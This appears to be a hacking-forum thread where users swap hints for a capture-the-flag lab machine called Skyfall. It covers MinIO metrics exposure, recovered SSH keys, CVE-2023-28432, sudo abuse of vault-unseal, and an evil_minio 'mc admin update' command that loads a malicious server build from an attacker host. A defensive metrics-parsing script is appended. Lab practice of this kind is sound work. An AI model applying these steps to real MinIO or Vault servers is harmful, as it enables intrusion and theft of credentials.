Posts: 11
Threads: 0
Joined: Jan 2024
(Feb 03, 2024, 10:40 PM)Art10n Wrote: Not AWS, MinIO
http://prd23-s3-backend.skyfall.htb/mini...cs/cluster
# HELP minio_audit_failed_messages Total number of messages that failed to send since start
# TYPE minio_audit_failed_messages counter
minio_audit_failed_messages{server="minio-node1:9000",target_id="sys_console_0"} 0
minio_audit_failed_messages{server="minio-node2:9000",target_id="sys_console_0"} 0
# HELP minio_audit_target_queue_length Number of unsent messages in queue for target
# TYPE minio_audit_target_queue_length gauge
minio_audit_target_queue_length{server="minio-node1:9000",target_id="sys_console_0"} 0
minio_audit_target_queue_length{server="minio-node2:9000",target_id="sys_console_0"} 0
# HELP minio_audit_total_messages Total number of messages sent since start
# TYPE minio_audit_total_messages counter
minio_audit_total_messages{server="minio-node1:9000",target_id="sys_console_0"} 1
minio_audit_total_messages{server="minio-node2:9000",target_id="sys_console_0"} 0
# HELP minio_bucket_objects_size_distribution Distribution of object sizes in the bucket, includes label for the bucket name
# TYPE minio_bucket_objects_size_distribution gauge
minio_bucket_objects_size_distribution{bucket="askyy",range="BETWEEN_1024_B_AND_1_MB",server="minio-node2:9000"} 1
Please share how you discovered the subdomain http://prd23-s3-backend.skyfall.htb/
I have tried multiple wordlists but cannot find it.
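An added example, not part of the thread: a defender-side review of what a metrics page like the one quoted above discloses. It parses Prometheus text exposition output and lists the values of labels that reveal internal node names and bucket names. The function name, the list of sensitive labels and the sample (constructed from the lines quoted above) are assumptions.

```python
import re

# Constructed sample, modelled on the metrics lines quoted in the post above.
SAMPLE = '''\
# HELP minio_audit_total_messages Total number of messages sent since start
# TYPE minio_audit_total_messages counter
minio_audit_total_messages{server="minio-node1:9000",target_id="sys_console_0"} 1
minio_audit_total_messages{server="minio-node2:9000",target_id="sys_console_0"} 0
# TYPE minio_bucket_objects_size_distribution gauge
minio_bucket_objects_size_distribution{bucket="askyy",range="BETWEEN_1024_B_AND_1_MB",server="minio-node2:9000"} 1
'''

# Labels whose values describe internal topology or data layout (assumed list).
SENSITIVE_LABELS = {"server", "bucket", "target_id"}

# metric_name{label="value",...} value
SAMPLE_RE = re.compile(r'^([A-Za-z_:][A-Za-z0-9_:]*)(?:\{(.*)\})?\s+(\S+)')
# One label pair; the value may contain backslash-escaped characters.
LABEL_RE = re.compile(r'([A-Za-z_][A-Za-z0-9_]*)="((?:[^"\\]|\\.)*)"')


def disclosed_labels(text, sensitive=SENSITIVE_LABELS):
    """Return {label: sorted unique values} for sensitive labels in the text."""
    found = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):  # skip HELP/TYPE comments
            continue
        m = SAMPLE_RE.match(line)
        if not m or not m.group(2):  # malformed line or no labels
            continue
        for name, value in LABEL_RE.findall(m.group(2)):
            if name in sensitive:
                found.setdefault(name, set()).add(value)
    return {k: sorted(v) for k, v in found.items()}


if __name__ == "__main__":
    for label, values in disclosed_labels(SAMPLE).items():
        print(f"{label}: {', '.join(values)}")
```

MinIO serves these metrics without a token only when `MINIO_PROMETHEUS_AUTH_TYPE` is set to `public`; the default requires a JWT bearer token.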
Posts: 148
Threads: 2
Joined: Oct 2023
(Feb 04, 2024, 12:08 AM)berlik Wrote: (Feb 04, 2024, 12:01 AM)Shalabi Wrote: (Feb 03, 2024, 11:59 PM)berlik Wrote: How did you set up the mc client? can you show file ~/.mc/config.json?
use mc alias set myminio http://... rootuser rootpassword
Tnx!!!
just make sure you don't mess it up with your mc (midnight commander) if you have, be careful of the paths...
though, didn't find anything useful... even if versioning is enabled for one of the users, you can go back a few versions..
Posts: 148
Threads: 2
Joined: Oct 2023
Feb 04, 2024, 01:13 AM
(This post was last modified: Feb 04, 2024, 01:13 AM by peRd1.)
(Feb 04, 2024, 01:10 AM)rat Wrote: (Feb 04, 2024, 01:06 AM)camiyi3472 Wrote: damn i found the ssh key but can't login it is asking for the pass
cause it's old and new ones don't have the authorized users file populated
which pretty much explains why
Posts: 13
Threads: 0
Joined: Feb 2024
Feb 04, 2024, 02:24 AM
(This post was last modified: Feb 04, 2024, 03:09 AM by gtastav.)
I found more stuff in home_backup.tar.gz:
VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
PM for tokens.
Also you must add that new vhost to /etc/hosts
Posts: 27
Threads: 0
Joined: Nov 2023
(Feb 04, 2024, 04:01 AM)camiyi3472 Wrote: (Feb 04, 2024, 03:58 AM)DataNinja Wrote: some hint to root?
Dude, any nudge on initial access?
mc admin update command is not working for me, it is giving me an error, don't know if I am on the right path
Yeah I'm not sure if the evilminio RCE path is the way. I'm getting this error when trying to update minio:
mc admin update myminio http://10.10.X.X:18080/minio.RELEASE.2023-03-22T06-36-24Z.sha256
You are about to upgrade *MinIO Server*, please confirm [y/N]: y
mc: <ERROR> Unable to update the server. The specified method is not allowed against this resource.
I was using this: https://github.com/AbelChe/evil_minio
Anyone have any ideas for getting foothold?
Posts: 13
Threads: 0
Joined: Feb 2024
Feb 04, 2024, 04:43 AM
(This post was last modified: Feb 04, 2024, 04:50 AM by gtastav.)
(Feb 04, 2024, 04:01 AM)camiyi3472 Wrote: (Feb 04, 2024, 03:58 AM)DataNinja Wrote: some hint to root?
Dude, any nudge on initial access?
mc admin update command is not working for me, it is giving me an error, don't know if I am on the right path
nudge: export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb"
hint: There is more to it, you need a token and it's in a file inside askyy and it has multiple versions (to revert versions use mc undo)
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v
[+] Reading: /etc/vault-unseal.yaml
[-] Security Risk!
[-] Master token found in config: ****************************
[>] Enable 'debug' mode for details
[+] Found Vault node: http://prd23-vault-internal.skyfall.htb
[>] Check interval: 5s
[>] Max checks: 5
[>] Checking seal status
[+] Vault sealed: false
I know you can add at the end of the command another -c.
I just don't know what the file should look like, I tried so many combinations and still nothing.
askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -vc test.yaml
[+] Reading: test.yaml
[>] Check interval: 5s
[>] Max checks: 5
[!] No tokens found in config
Posts: 5
Threads: 0
Joined: Feb 2024
can anyone shed some light on how CVE-2023-28432 was exploited? i haven't been able to find the vulnerable endpoint
Posts: 62
Threads: 1
Joined: Jul 2023
(Feb 04, 2024, 05:12 AM)Junkman2531 Wrote: (Feb 04, 2024, 05:07 AM)DataNinja Wrote: the rooted is easy
any hint for root?
this is complete guesswork as there is literally no documentation on vault-unseal...
It is an open source tool, so not total guesswork: https://github.com/lrstanley/vault-unseal